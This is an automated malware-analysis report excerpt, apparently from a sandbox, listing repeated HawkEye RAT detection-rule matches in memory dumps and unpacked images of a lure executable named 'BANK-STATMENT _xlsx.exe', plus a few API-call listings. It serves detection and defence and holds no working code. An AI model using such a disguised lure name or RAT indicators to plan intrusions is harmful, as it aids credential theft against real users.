                Source: 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000E.00000002.788401031.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000015.00000002.853095833.00000000021E2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000001C.00000002.870010845.00000000027A2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000F.00000002.799181132.0000000002312000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000001D.00000002.883606602.0000000002462000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.803587831.0000000002F02000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000000.00000002.666309079.0000000002817000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000F.00000002.797891393.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001D.00000002.885702309.0000000002F42000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000001C.00000002.870272329.0000000002837000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000F.00000002.797771687.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000026.00000002.932841604.0000000002F34000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000022.00000002.911923188.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000022.00000002.911923188.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000001.00000002.766451642.00000000009D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000E.00000002.788526759.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000015.00000002.853013004.0000000002150000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000015.00000002.852539322.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000000.00000002.666235176.0000000002782000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000F.00000002.798965975.0000000002252000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000015.00000002.855941175.0000000002A31000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000015.00000001.813031999.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000001.00000002.767298778.00000000023B2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000001.00000002.770219917.0000000002AF1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000F.00000002.798500055.0000000000810000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 00000015.00000002.853286228.00000000022C2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0000000F.00000001.785219561.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 1.2.BANK-STATMENT _xlsx.exe.23b0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.2.BANK-STATMENT _xlsx.exe.2310000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 33.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 1.2.BANK-STATMENT _xlsx.exe.2290000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 28.2.BANK-STATMENT _xlsx.exe.27a0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 34.2.BANK-STATMENT _xlsx.exe.2400000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 38.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 28.2.BANK-STATMENT _xlsx.exe.2750000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 0.2.BANK-STATMENT _xlsx.exe.2780000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 29.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 21.2.BANK-STATMENT _xlsx.exe.21e0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.2.BANK-STATMENT _xlsx.exe.2250000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 38.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 38.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 21.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 34.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 34.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 34.2.BANK-STATMENT _xlsx.exe.22d0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 29.2.BANK-STATMENT _xlsx.exe.23d0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 14.2.BANK-STATMENT _xlsx.exe.25e0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 21.2.BANK-STATMENT _xlsx.exe.22c0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 1.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 29.2.BANK-STATMENT _xlsx.exe.ad0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 20.2.BANK-STATMENT _xlsx.exe.26b0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 38.2.BANK-STATMENT _xlsx.exe.2350000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.2.BANK-STATMENT _xlsx.exe.810000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 21.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 21.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 38.2.BANK-STATMENT _xlsx.exe.2230000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 29.2.BANK-STATMENT _xlsx.exe.2460000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 1.2.BANK-STATMENT _xlsx.exe.9d0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 15.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 15.1.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 21.2.BANK-STATMENT _xlsx.exe.2150000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 37.2.BANK-STATMENT _xlsx.exe.27c0000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 14.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 34.2.BANK-STATMENT _xlsx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 34.2.BANK-STATMENT _xlsx.exe.2360000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 38.2.BANK-STATMENT _xlsx.exe.22c0000.2.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                Source: 33.2.BANK-STATMENT _xlsx.exe.2640000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00454818 NtdllDefWindowProc_A,0_2_00454818
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00454F94 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_00454F94
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00455044 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_00455044
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_00449408 GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_00449408
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_0042D6D0 NtdllDefWindowProc_A,0_2_0042D6D0
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 0_2_004397C4 NtdllDefWindowProc_A,GetCapture,0_2_004397C4
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 1_2_00490159 NtCreateSection,1_2_00490159
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00454818 NtdllDefWindowProc_A,2_2_00454818
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00454F94 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,2_2_00454F94
                Source: C:\Users\user\Desktop\BANK-STATMENT _xlsx.exeCode function: 2_2_00455044 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,2_2_00455044
